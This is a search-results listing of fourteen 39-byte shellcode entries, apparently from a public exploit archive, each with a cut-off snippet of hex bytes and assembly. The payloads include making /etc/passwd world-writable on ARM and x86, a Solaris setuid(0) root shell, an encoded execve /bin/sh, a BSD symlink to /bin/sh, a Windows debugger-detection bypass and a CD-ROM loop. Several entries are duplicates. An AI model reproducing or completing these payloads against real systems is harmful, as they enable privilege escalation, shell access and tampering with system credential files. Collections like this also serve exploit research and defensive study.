14 matches found
Linux/ARM - chmod(/etc/passwd, 0777) Shellcode (39 bytes)
/ Title : Linux/ARM - chmod"/etc/passwd", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...
solaris/x86 setuid(0), execve(//bin/sh); exit(0) NULL Free 39 bytes
No description provided by source. / ; sm4x 2008 ; setuid0, execve'/bin/sh', '/bin/sh', 0, ; 39 bytes NizzULL free you know... ; SunOS sol01 5.11 snv86 i86pc i386 i86pc Solaris ; quick port to drop root sh - ; - SunOS is pwnij global start start: xor eax, eax ; --- setuid0 push eax push eax mov a...
linux/x86 mkdir() 'haxor' and exit() Shellcode - 39 bytes
/ ; Title: mkdir 'haxor' and exit Shellcode - 39 bytes ; Platform: linux/x8664 ; Date: 2014-06-26 ; Author: Osanda Malith Jayathissa @OsandaMalith section .text global start start: jmp callshellcode shellcode: pop rsi xor rax, rax mov al, 0x53 mov rdi, rsi mov si, 0x1ed syscall xor rax, rax add...
Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)
Linux/ARM - chmod /etc/passwd 0777 Shellcode 39 bytes. Shellcode exploit for ARM platform / Title : Linux/ARM - chmod"/etc/passwd", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x0...
linux/x86 whoami shellcode 39 bytes
Exploit for linux/x86 platform in category shellcode =================================== linux/x86 whoami shellcode 39 bytes =================================== / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1...
linux/x86 sys_chmod("/etc/passwd",599) shellcode 39 bytes
Exploit for linux/x86 platform in category shellcode ========================================================= linux/x86 syschmod"/etc/passwd",599 shellcode 39 bytes ========================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 ...
Windows Seven Pro SP1 64 Fr (Beep) Shellcode 39 Bytes
Exploit for win32 platform in category shellcode ===================================================== Windows Seven Pro SP1 64 Fr Beep Shellcode 39 Bytes ===================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ ...
BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)
BSD/x86 - symlink /bin/sh sh Shellcode 39 bytes. Shellcode exploit for BSDx86 platform /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. size = 39 bytes OS = BSD written by /rootteam/dev0id rootteam.void.ru BITS 32 jmp short callme main: pop esi xor eax,eax mo...
solaris/x86 setuid(0), execve(//bin/sh); exit(0) NULL Free 39 bytes
Exploit for solaris/x86 platform in category shellcode =================================================================== solaris/x86 setuid0, execve//bin/sh; exit0 NULL Free 39 bytes =================================================================== / ; sm4x 2008 ; setuid0, execve'/bin/sh',...
win32 IsDebuggerPresent ShellCode NT/XP 39 bytes
win32 IsDebuggerPresent ShellCode NT/XP 39 bytes. Shellcode exploit for win32 platform / Shellcode Length: 39 bytes / / sets PEB-BeingDebugged to 0 / / IsDebuggerPresent/BeingDebugged bypass / / by ex-pb @ [email protected] / / greets: xgx and all i forgot / include include char ShellCode = "\xEB"...
linux/x86 execve /bin/sh (encoded by +1) 39 bytes
No description provided by source. / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik [email protected] / char shellcode = "\x68\x8a\xe2\xce\x81" // push $0x81cee28a "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 "\x68\x6a\x6f\x8a\xe4" // push $0xe48a6f6a...
linux/x86 - execve /bin/sh encoded by +1 39 bytes
linux/x86 execve /bin/sh encoded by +1 39 bytes. Shellcode exploit for linx86 platform / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik / char shellcode = "\x68\x8a\xe2\xce\x81" // push $0x81cee28a "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 "\x68\x6a\x6f\x8a\xe4" /...
linux/x86 24/7 open cd-rom loop follows /dev/cdrom symlink 39 bytes
linux/x86 24/7 open cd-rom loop follows /dev/cdrom symlink 39 bytes. Shellcode exploit for linx86 platform / linux/x86 24/7 open cd-rom loop follows "/dev/cdrom" symlink - 39 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx...
linux/x86 24/7 open cd-rom loop (follows /dev/cdrom symlink) 39 bytes
No description provided by source. / linux/x86 24/7 open cd-rom loop follows "/dev/cdrom" symlink - 39 bytes - izik [email protected] / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\xb5\x08" // mov $0x8,%ch "\x68\x64\x72\x6f\x6d" // pus...